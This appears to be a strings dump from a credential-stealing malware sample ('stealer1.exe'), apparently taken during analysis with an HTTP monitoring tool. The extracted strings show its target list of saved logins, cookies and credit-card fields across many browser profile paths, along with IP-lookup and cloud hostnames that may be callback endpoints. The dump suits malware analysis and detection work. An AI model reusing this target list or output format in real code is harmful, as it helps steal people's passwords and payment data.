  1326. 0x9d3498 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
  1327. 0x9d34ec (18): stealer1.exe[2956]
  1328. 0x9d3500 (15): CurrentThreadID
  1329. 0x9d3515 (11):
  1330. NotifyType
  1331. 0x9d3524 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
  1332. 0x9d3555 (14):
  1333. RemoteAddress
  1334. 0x9d3567 (12): SocketHandle
  1335. 0x9d357a (12): LocalAddress
  1336. 0x9d358a (14): DLLNotifyEvent
  1337. 0x9d359b (14):
  1338. ConnectHandle
  1339. 0x9d35b0 (15): Socket_IsSecure
  1340. 0x9d35c2 (15): Socket_DataSize
  1341. 0x9d35d8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
  1342. 0x9d3606 (15): RequestComplete
  1343. 0x9d361c (15): ReceiveLastByte
  1344. 0x9d3631 (14):
  1345. SendFirstByte
  1346. 0x9d3646 (14): DNSLookUpStart
  1347. 0x9d365b (16): ReceiveFirstByte
  1348. 0x9d3672 (12): SendLastByte
  1349. 0x9d3684 (10): StartTick
  1350. 0x9d3695 (12): ConnectStart
  1351. 0x9d36a9 (12): qh.MemStream
  1352. 0x9d36b6 (6): Z*s5C[
  1353. 0x9d3759 (6): ^jszM"
  1354. 0x9d37d2 (7): XDDfs:O
  1355. 0x9d3a0b (6): 7b0G2N
  1356. 0x9da6c8 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
  1357. 0x9da71c (18): stealer1.exe[2956]
  1358. 0x9da730 (15): CurrentThreadID
  1359. 0x9da745 (11):
  1360. NotifyType
  1361. 0x9da754 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
  1362. 0x9da785 (14):
  1363. RemoteAddress
  1364. 0x9da7aa (12): LocalAddress
  1365. 0x9da7ba (14): DLLNotifyEvent
  1366. 0x9da7cb (14):
  1367. ConnectHandle
  1368. 0x9da7e0 (15): Socket_IsSecure
  1369. 0x9da7f2 (15): Socket_DataSize
  1370. 0x9da808 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
  1371. 0x9da836 (15): RequestComplete
  1372. 0x9da84c (15): ReceiveLastByte
  1373. 0x9da861 (14):
  1374. SendFirstByte
  1375. 0x9da876 (14): DNSLookUpStart
  1376. 0x9da88b (16): ReceiveFirstByte
  1377. 0x9da8a2 (12): SendLastByte
  1378. 0x9da8b4 (10): StartTick
  1379. 0x9da8c5 (12): ConnectStart
  1380. 0x9da8d9 (12): qh.MemStream
  1381. 0x9db2a8 (7): imeTick
  1382. 0x9db2ba (11): RequestGUID
  1383. 0x9db2c6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
  1384. 0x9db2ef (11): ProcessName
  1385. 0x9db2fc (18): stealer1.exe[2956]
  1386. 0x9db310 (15): CurrentThreadID
  1387. 0x9db325 (11):
  1388. NotifyType
  1389. 0x9db334 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
  1390. 0x9db365 (14):
  1391. RemoteAddress
  1392. 0x9db377 (12): SocketHandle
  1393. 0x9db38a (12): LocalAddress
  1394. 0x9db39a (14): DLLNotifyEvent
  1395. 0x9db3ab (14):
  1396. ConnectHandle
  1397. 0x9db3c0 (15): Socket_IsSecure
  1398. 0x9db3d2 (15): Socket_DataSize
  1399. 0x9db3e8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
  1400. 0x9db416 (15): RequestComplete
  1401. 0x9db42c (15): ReceiveLastByte
  1402. 0x9db441 (14):
  1403. SendFirstByte
  1404. 0x9db456 (14): DNSLookUpStart
  1405. 0x9db46b (16): ReceiveFirstByte
  1406. 0x9db482 (12): SendLastByte
  1407. 0x9db494 (10): StartTick
  1408. 0x9db4a5 (12): ConnectStart
  1409. 0x9db4b9 (12): qh.MemStream
  1410. 0x9db97d (7): 8705OD&
  1411. 0x9dbc92 (9): J/rua]lE!
  1412. 0x9dbdcd (6): sdPtDn
  1413. 0x9dc250 (6): Mm*,kZ
  1414. 0x9dc3de (6): "%[QQ
  1415. 0x9dc440 (6): @q/ir?
  1416. 0x9dc6e3 (6): jXrN
  1417. W
  1418. 0x9dc834 (7): Zu>=fuU
  1419. 0x9dc87d (7): 7KI%hHL
  1420. 0x9dc936 (7): P4/q
  1421. =
  1422. 0x9dd08c (7): ]}^O\r5
  1423. 0x9dd099 (6): h$d_M]
  1424. 0x9dd176 (6): indFYS
  1425. 0x9dd373 (6): Tv>@Md
  1426. 0x9dd486 (7): S#$cb6?
  1427. 0x9dd5e9 (6): cBt#A4
  1428. 0x9dd7c6 (6): wuu|Q7
  1429. 0x9dd875 (8): E=K}jgwc
  1430. 0x9ddb18 (6): -<gQBy
  1431. 0x9ddb87 (9): !&NWiq$&
  1432. 0x9ddeba (6): M<J,a|
  1433. 0x9de096 (9): WN!ybu $h
  1434. 0x9de0d9 (6): Y#F2:k
  1435. 0x9de20a (8): _iC)Yk<>
  1436. 0x9de78b (6): 93
  1437. 1%1
  1438. 0x9de8a7 (6): ,/,DWO
  1439. 0x9ded6b (7): ^?b5rCq
  1440. 0x9df1b2 (6): #:]KT;
  1441. 0x9df2df (7): uOhm'ah
  1442. 0x9df36e (7): x4#fFql
  1443. 0x9df42b (6): w4lR[~
  1444. 0x9e25f8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24296
  1445. 0x9e4cf8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $7574129d
  1446. 0x9e9928 (100): NamedBuffer, mAH, Process $00000b8c, API $76d24296
  1447. 0x9ec028 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24406
  1448. 0x9f0158 (100): NamedBuffer, mAH, Process $00000b8c, API $76d26f01
  1449. 0x9f79b0 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
  1450. 0xa05ae8 (100): NamedBuffer, mix, Process $00000b8c, API $76d26f01
  1451. 0xa1b6d8 (38): \RPC Control\mchIpcHttpAnalyzer_StdV71
  1452. 0xa1b738 (37): \RPC Control\mchIpcHttpAnalyzer_StdV7
  1453. 0xa1b75e (38): HttpAnalyzer_StdV71
  1454. 0xa227ac (7): -VkTJ)<
  1455. 0xa2283f (7): INlV9QC
  1456. 0xa22af9 (7): 9#(|F^9
  1457. 0xa22ba4 (7): gkI_K5F
  1458. 0xa22d30 (7): PZ(h9}
  1459.  
  1460. 0xa22edc (6): IZN|;n
  1461. 0xa2312d (8): 2R/D\RV4
  1462. 0xa2327c (6): Doc6NZ
  1463. 0xa2391d (6): cICTSO
  1464. 0xa23c13 (7): _].w<:
  1465. 0xa23caa (6): {ZC -Y
  1466. 0xa23e1c (6): {\^
  1467. R
  1468. 0xa23fcb (7): HA7??oM
  1469. 0xa2417e (7): jstY4#:
  1470. 0xa242b2 (6): s"d5#Z
  1471. 0xa24752 (7): +XMQr$)
  1472. 0xa2481b (8): {vS]\7h,
  1473. 0xa24948 (8): V^Rihet^
  1474. 0xa24b59 (6): @tC_V$
  1475. 0xa24f23 (12): freebl3.dll
  1476.  
  1477. 0xa24f80 (12): mozglue.dll
  1478.  
  1479. 0xa24fdd (9): nss3.dll
  1480.  
  1481. 0xa25037 (13): softokn3.dll
  1482.  
  1483. 0xa25095 (12): nssdbm3.dll
  1484.  
  1485. 0xa2524e (9): WN!ybu $h
  1486. 0xa25291 (6): Y#F2:k
  1487. 0xa252b8 (7): imeTick
  1488. 0xa252ca (11): RequestGUID
  1489. 0xa252d6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
  1490. 0xa252ff (11): ProcessName
  1491. 0xa2530c (18): stealer1.exe[2956]
  1492. 0xa25320 (15): CurrentThreadID
  1493. 0xa25335 (11):
  1494. NotifyType
  1495. 0xa25344 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
  1496. 0xa25375 (14):
  1497. RemoteAddress
  1498. 0xa25387 (12): SocketHandle
  1499. 0xa2539a (12): LocalAddress
  1500. 0xa253aa (14): DLLNotifyEvent
  1501. 0xa253bb (14):
  1502. ConnectHandle
  1503. 0xa253d0 (15): Socket_IsSecure
  1504. 0xa253e2 (15): Socket_DataSize
  1505. 0xa253f8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
  1506. 0xa25426 (15): RequestComplete
  1507. 0xa2543c (15): ReceiveLastByte
  1508. 0xa25451 (14):
  1509. SendFirstByte
  1510. 0xa25466 (14): DNSLookUpStart
  1511. 0xa2547b (16): ReceiveFirstByte
  1512. 0xa25492 (12): SendLastByte
  1513. 0xa254a4 (10): StartTick
  1514. 0xa254b5 (12): ConnectStart
  1515. 0xa254c9 (12): qh.MemStream
  1516. 0xa25604 (7): -VkTJ)<
  1517. 0xa25697 (7): INlV9QC
  1518. 0xa25951 (7): 9#(|F^9
  1519. 0xa259fc (7): gkI_K5F
  1520. 0xa25b88 (7): PZ(h9}
  1521.  
  1522. 0xa25d34 (6): IZN|;n
  1523. 0xa25f85 (8): 2R/D\RV4
  1524. 0xa260d4 (6): Doc6NZ
  1525. 0xa26775 (6): cICTSO
  1526. 0xa26a6b (7): _].w<:
  1527. 0xa26b02 (6): {ZC -Y
  1528. 0xa26c74 (6): {\^
  1529. R
  1530. 0xa26e23 (7): HA7??oM
  1531. 0xa26fd6 (7): jstY4#:
  1532. 0xa2710a (6): s"d5#Z
  1533. 0xa275aa (7): +XMQr$)
  1534. 0xa27673 (8): {vS]\7h,
  1535. 0xa277a0 (8): V^Rihet^
  1536. 0xa279b1 (6): @tC_V$
  1537. 0xa27d7b (12): freebl3.dll
  1538.  
  1539. 0xa27dd8 (12): mozglue.dll
  1540.  
  1541. 0xa27e35 (9): nss3.dll
  1542.  
  1543. 0xa27e8f (13): softokn3.dll
  1544.  
  1545. 0xa27eed (12): nssdbm3.dll
  1546.  
  1547. 0xa27f34 (30): pAnalyzer_StdV7
  1548. 0xa29b1d (6): Qkkbal
  1549. 0xa46818 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
  1550. 0xa46898 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
  1551. 0xa468d8 (50): NamedBuffer, mAH, Process $00000b8c, API $7574129d
  1552. 0xa46918 (50): NamedBuffer, mAH, Process $00000b8c, API $71ac0000
  1553. 0xa4da58 (55): Software\IEInspectorSoft\HTTPAnalyzerStd\7.x\Properties
  1554. 0xa5c028 (9): Disk full
  1555. 0xa5c070 (7): January
  1556. 0xa5c088 (8): February
  1557. 0xa5c100 (6): August
  1558. 0xa5c118 (9): September
  1559. 0xa5c130 (7): October
  1560. 0xa5c148 (8): November
  1561. 0xa5c160 (8): December
  1562. 0xa5c178 (6): Sunday
  1563. 0xa5c190 (6): Monday
  1564. 0xa5c1a8 (7): Tuesday
  1565. 0xa5c1c0 (9): Wednesday
  1566. 0xa5c1d8 (8): Thursday
  1567. 0xa5c1f0 (6): Friday
  1568. 0xa5c208 (8): Saturday
  1569. 0xa5c220 (8): M/d/yyyy
  1570. 0xa5c238 (9): h:mm AMPM
  1571. 0xa5c550 (9): Exception
  1572. 0xa5c568 (6): EAbort
  1573. 0xa5c580 (11): EInOutError
  1574. 0xa5c598 (9): EIntError
  1575. 0xa5c5b0 (10): EDivByZero
  1576. 0xa5c5c8 (11): ERangeError
  1577. 0xa5c5e0 (10): EMathError
  1578. 0xa5c5f8 (10): EInvalidOp
  1579. 0xa5c610 (11): EZeroDivide
  1580. 0xa5c628 (9): EOverflow
  1581. 0xa5c640 (10): EUnderflow
  1582. 0xa5c658 (10): EPrivilege
  1583. 0xa5c670 (9): EControlC
  1584. 0xa5c688 (11): EFOpenError
  1585. 0xa5c6a0 (11): EFilerError
  1586. 0xa5c6b8 (10): EReadError
  1587. 0xa5c6d0 (11): EWriteError
  1588. 0xa5c6e8 (10): EListError
  1589. 0xa5c700 (10): EBitsError
  1590. 0xa5c718 (7): EThread
  1591. 0xa5c730 (9): EParseCSV
  1592. 0xa5c7f0 (11): qh.IntfList
  1593. 0xa5c820 (10): qh.HashMap
  1594. 0xa5c880 (7): qh.List
  1595. 0xa5c8f8 (10): qh.HashSet
  1596. 0xa5ca30 (10): ws2_32.dll
  1597. 0xa5ca78 (7): WSARecv
  1598. 0xa5ca90 (11): wsock32.dll
  1599. 0xa5caa8 (11): wsock32.dll
  1600. 0xa5cac0 (11): secur32.dll
  1601. 0xa5cb08 (11): wsock32.dll
  1602. 0xa5cb20 (7): WSASend
  1603. 0xa5cb38 (11): wsock32.dll
  1604. 0xa5cb50 (10): ws2_32.dll
  1605. 0xa5cb68 (10): ws2_32.dll
  1606. 0xa5cb80 (10): ws2_32.dll
  1607. 0xa5cb98 (9): SSL_write
  1608. 0xa5cbb0 (7): WSARecv
  1609. 0xa5cbc8 (10): ws2_32.dll
  1610. 0xa5cbe0 (7): connect
  1611. 0xa5cbf8 (7): WSASend
  1612. 0xa5cc10 (11): secur32.dll
  1613. 0xa5cc28 (10): ws2_32.dll
  1614. 0xa5cc40 (10): ws2_32.dll
  1615. 0xa5cc58 (10): ws2_32.dll
  1616. 0xa5cc70 (11): getaddrinfo
  1617. 0xa5cc88 (10): WSAConnect
  1618. 0xa5cca0 (11): wininet.dll
  1619. 0xa5ccb8 (8): SSL_read
  1620. 0xa5cce8 (8): 2956.576
  1621. 0xa5cd00 (10): NotifyType
  1622. 0xa5cd30 (11): ProcessName
  1623. 0xa5cd60 (8): TimeTick
  1624. 0xa5cd78 (11): RequestGUID
  1625. 0xa5cd90 (9): StartTick
  1626. 0xa63358 (41): Variant or safe array index out of bounds
  1627. 0xa63390 (36): Error creating variant or safe array
  1628. 0xa64200 (39): wINetIPCMsgs.TwiWebPageNotifyParamsIMPL
  1629. 0xa64270 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
  1630. 0xa642e0 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
  1631. 0xa644a0 (38): {C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
  1632. 0xa64628 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
  1633. 0xa64820 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
  1634. 0xa6a688 (16): Assertion failed
  1635. 0xa6a6a8 (16): Invalid argument
  1636. 0xa6a6c8 (14): Stack overflow
  1637. 0xa6a6e8 (13): Control-C hit
  1638. 0xa6a708 (16): Access violation
  1639. 0xa6a728 (16): Integer overflow
  1640. 0xa6a748 (17): Range check error
  1641. 0xa6a768 (16): Division by zero
  1642. 0xa6a788 (18): File access denied
  1643. 0xa6a7a8 (19): Too many open files
  1644. 0xa6a7c8 (16): Invalid filename
  1645. 0xa6a7e8 (14): File not found
  1646. 0xa6a808 (13): Out of memory
  1647. 0xa6a828 (14): Service Pack 1
  1648. 0xa6a848 (19): dddd, MMMM dd, yyyy
  1649. 0xa6a868 (12): h:mm:ss AMPM
  1650. 0xa6a888 (15): TInvokableClass
  1651. 0xa6a8a8 (15): TSoapDataModule
  1652. 0xa6a8c8 (17): TSOAPDOMProcessor
  1653. 0xa6a8e8 (12): THTTPReqResp
  1654. 0xa6a908 (12): TXMLDocument
  1655. 0xa6a948 (19): C:\Windows\system32
  1656. 0xa6ab68 (12): EInvalidCast
  1657. 0xa6aba8 (13): EConvertError
  1658. 0xa6abe8 (13): EVariantError
  1659. 0xa6ac28 (13): EPropReadOnly
  1660. 0xa6ac68 (14): EPropWriteOnly
  1661. 0xa6aca8 (16): EAssertionFailed
  1662. 0xa6ace8 (14): EAbstractError
  1663. 0xa6ad28 (14): EIntfCastError
  1664. 0xa6ad68 (17): EInvalidContainer
  1665. 0xa6ada8 (14): EInvalidInsert
  1666. 0xa6ade8 (13): EPackageError
  1667. 0xa6ae28 (18): ESafecallException
  1668. 0xa6ae68 (18): EExternalException
  1669. 0xa6af08 (12): EIntOverflow
  1670. 0xa6afe8 (16): EAccessViolation
  1671. 0xa6b048 (14): EStackOverflow
  1672. 0xa6b0a8 (12): EStreamError
  1673. 0xa6b0e8 (13): EFCreateError
  1674. 0xa6b1a8 (14): EClassNotFound
  1675. 0xa6b1e8 (15): EMethodNotFound
  1676. 0xa6b228 (13): EInvalidImage
  1677. 0xa6b268 (12): EResNotFound
  1678. 0xa6b2e8 (16): EStringListError
  1679. 0xa6b328 (15): EComponentError
  1680. 0xa6b368 (12): EParserError
  1681. 0xa6b3a8 (15): EOutOfResources
  1682. 0xa6b3e8 (17): EInvalidOperation
  1683. 0xa6b448 (13): EqhValidation
  1684. 0xa6b488 (12): qh.MemStream
  1685. 0xa6b4a8 (14): qh.IntfHashMap
  1686. 0xa6b4c8 (13): qh.StringList
  1687. 0xa6b4e8 (17): qh.VectorIterator
  1688. 0xa6b508 (19): qh.IntfListIterator
  1689. 0xa6b528 (14): qh.IntfHashSet
  1690. 0xa6b568 (18): stealer1.exe[2956]
  1691. 0xa6b5c8 (18): HttpAnalyzer_StdV7
  1692. 0xa6b5e8 (19): HttpAnalyzer_StdV71
  1693. 0xa6b608 (14): DecryptMessage
  1694. 0xa6b628 (14): EncryptMessage
  1695. 0xa6b648 (13): gethostbyname
  1696. 0xa6b668 (16): InternetConnectA
  1697. 0xa6b6a8 (12): ssleay32.dll
  1698. 0xa6b6c8 (12): ssleay32.dll
  1699. 0xa6b6e8 (12): kernel32.dll
  1700. 0xa6b708 (15): HttpsSendBuffer
  1701. 0xa6b7a8 (18): HttpAnalyzer_StdV7
  1702. 0xa6b808 (12): LocalAddress
  1703. 0xa6b828 (12): qh.MemStream
  1704. 0xa6b848 (12): SocketHandle
  1705. 0xa6b868 (14): DLLNotifyEvent
  1706. 0xa6b888 (12): qh.MemStream
  1707. 0xa6b8a8 (18): HttpAnalyzer_StdV7
  1708. 0xa6b8c8 (13): RemoteAddress
  1709. 0xa6b8e8 (19): \RPC Control\mchIpc
  1710. 0xa6b908 (16): ReceiveFirstByte
  1711. 0xa6b928 (15): ReceiveLastByte
  1712. 0xa6b948 (15): RequestComplete
  1713. 0xa6b968 (14): DNSLookUpStart
  1714. 0xa6b988 (13): SendFirstByte
  1715. 0xa6b9a8 (15): ReceiveLastByte
  1716. 0xa6b9c8 (15): RequestComplete
  1717. 0xa719b8 (23): Interface not supported
  1718. 0xa719e0 (21): External exception %x
  1719. 0xa71a08 (25): Invalid variant operation
  1720. 0xa71a30 (22): Privileged instruction
  1721. 0xa71a58 (22): Invalid class typecast
  1722. 0xa71a80 (24): Floating point underflow
  1723. 0xa71aa8 (23): Floating point overflow
  1724. 0xa71ad0 (21): Invalid numeric input
  1725. 0xa71af8 (23): Read beyond end of file
  1726. 0xa71b20 (25): Invalid pointer operation
  1727. 0xa721b0 (22): qh.StreamableException
  1728. 0xa721d8 (20): qh.SimplePropertyBag
  1729. 0xa72200 (24): wINetTypes.TwiNotifyImpl
  1730. 0xa72340 (20): ws2_32.dll
  1731. 0xa72390 (22): wsock32.dll
  1732. 0xa723b8 (24): ssleay32.dll
  1733. 0xa723e0 (22): wsock32.dll
  1734. 0xa72408 (24): ssleay32.dll
  1735. 0xa72430 (20): ws2_32.dll
  1736. 0xa72458 (20): ws2_32.dll
  1737. 0xa72480 (20): ws2_32.dll
  1738. 0xa724a8 (20): ws2_32.dll
  1739. 0xa724f8 (22): WSAGetOverlappedResult
  1740. 0xa72520 (20): ws2_32.dll
  1741. 0xa72548 (20): ws2_32.dll
  1742. 0xa72570 (20): ws2_32.dll
  1743. 0xa72598 (22): wininet.dll
  1744. 0xa725c0 (22): secur32.dll
  1745. 0xa725e8 (22): secur32.dll
  1746. 0xa72610 (22): wsock32.dll
  1747. 0xa72638 (22): wsock32.dll
  1748. 0xa726b0 (25): GetQueuedCompletionStatus
  1749. 0xa72700 (24): kernel32.dll
  1750. 0xa72840 (20): ProcessIdToSessionId
  1751. 0xa78ce8 (28): Exception in safecall method
  1752. 0xa78d18 (34): Variant method calls not supported
  1753. 0xa78d48 (31): Invalid variant type conversion
  1754. 0xa78d78 (31): Floating point division by zero
  1755. 0xa78da8 (32): Invalid floating point operation
  1756. 0xa78f58 (35): wINetIPCMsgs.TwiDLLNotifyParamsImpl
  1757. 0xa78f88 (35): wINetIPCMsgs.TwiLogNotifyParamsIMPL
  1758. 0xb00850 (124): Global\BFE_Notify_Event_{97b51811-6670-4505-8b2a-5b63fedd33c9}
  1759. 0xbc07ea (12): Psched
  1760. 0xbc08e4 (12): Tcpip6
  1761. 0xbc0b54 (40): MSAFD Tcpip [TCP/IP]
  1762. 0xbc0b7e (42): 2\wshtcpip.dll,-60100
  1763. 0xbc0dc8 (40): MSAFD Tcpip [UDP/IP]
  1764. 0xbc0df2 (42): 2\wshtcpip.dll,-60101
  1765. 0xbc103c (40): MSAFD Tcpip [RAW/IP]
  1766. 0xbc1066 (42): 2\wshtcpip.dll,-60102
  1767. 0xbc12b0 (44): MSAFD Tcpip [TCP/IPv6]
  1768. 0xbc12de (34): wship6.dll,-60100
  1769. 0xbc1524 (44): MSAFD Tcpip [UDP/IPv6]
  1770. 0xbc1552 (34): wship6.dll,-60101
  1771. 0xbc1798 (44): MSAFD Tcpip [RAW/IPv6]
  1772. 0xbc17c6 (34): wship6.dll,-60102
  1773. 0xbc1a0c (54): RSVP TCPv6 Service Provider
  1774. 0xbc1a44 (20): s.dll,-100
  1775. 0xbc1c80 (50): RSVP TCP Service Provider
  1776. 0xbc1cb4 (24): qos.dll,-101
  1777. 0xbc1ef4 (54): RSVP UDPv6 Service Provider
  1778. 0xbc1f2c (20): s.dll,-102
  1779. 0xbc2168 (50): RSVP UDP Service Provider
  1780. 0xbc219c (24): qos.dll,-103
  1781. 0xc64818 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
  1782. 0xc648ea (14): Q!1AQaq
  1783. 0xf701d8 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
  1784. 0xf702aa (14): Q!1AQaq
  1785. 0x1080864 (26): api.ipify.org
  1786. 0x1080b78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
  1787. 0x1080bf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
  1788. 0x1080c78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
  1789. 0x1080cf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
  1790. 0x1080d78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
  1791. 0x1080df8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
  1792. 0x1080e78 (44): no-19599.herokussl.com
  1793. 0x1080ec0 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
  1794. 0x1080f48 (18): ipify.org
  1795. 0x1080f80 (52): nagano-19599.herokussl.com
  1796. 0x2e6f26f (6): ws#
  1797. ul
  1798. 0x71b00025 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
  1799. 0x71b00345 (6): 8LdrLu
  1800. 0x7ffe0030 (20): d:\Windows
  1801.  
  1802.  
  1803. Login: %s
  1804. Password: %s
  1805.  
  1806. templogin Login Data %s\%s templogin ERROR Don't copy string
  1807. Amigo.txt %s\Amigo\User Data\Default a GOOGLE.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch.txt a Opera.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium.txt a Maxthon5.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc.txt a GOOGLE.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 4 a Amigo.txt %s\Amigo\User Data\Profile 4 a Amigo.txt %s\Amigo\User Data\Profile 1 a Amigo.txt %s\Amigo\User Data\Profile 2 a Amigo.txt %s\Amigo\User Data\Profile 3 a %s a %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s Name Card: %s
  1808. Expiration Month: %s
  1809. Expiration Year: %s
  1810. Number Card: %s
  1811. Billing address id: %s
  1812. Email: %s
  1813. Number: %s
  1814. First name: %s
  1815. Middle name: %s
  1816. Last name: %s
  1817. Full name: %s
  1818. Ñompany name: %s
  1819. Street address: %s
  1820. Dependent locality: %s
  1821. City: %s
  1822. State: %s
  1823. Zipcode: %s
  1824.  
  1825.  
  1826. a %s %s %s %s %s TRUE %s FALSE %s %s %s
  1827. templogim Cookies %s\%s templogim templogik Web Data %s\%s templogik Amigo_Cookies.txt %s\Amigo\User Data\Default a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi_Cookies.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex_Cookies.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa_Cookies.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum_Cookies.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo_Cookies.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch_Cookies.txt a Opera_Cookies.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu_Cookies.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler_Cookies.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium_Cookies.txt a Maxthon5_Cookies.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik_Cookies.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic_Cookies.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc_Cookies.txt a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 4 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 4 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 1 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 2 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 3 a Amigo_CC.txt %s\Amigo\User Data\Default a GOOGLE_CC.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi_CC.txt a %s\Yandex\YandexBrowser\User Data\Default 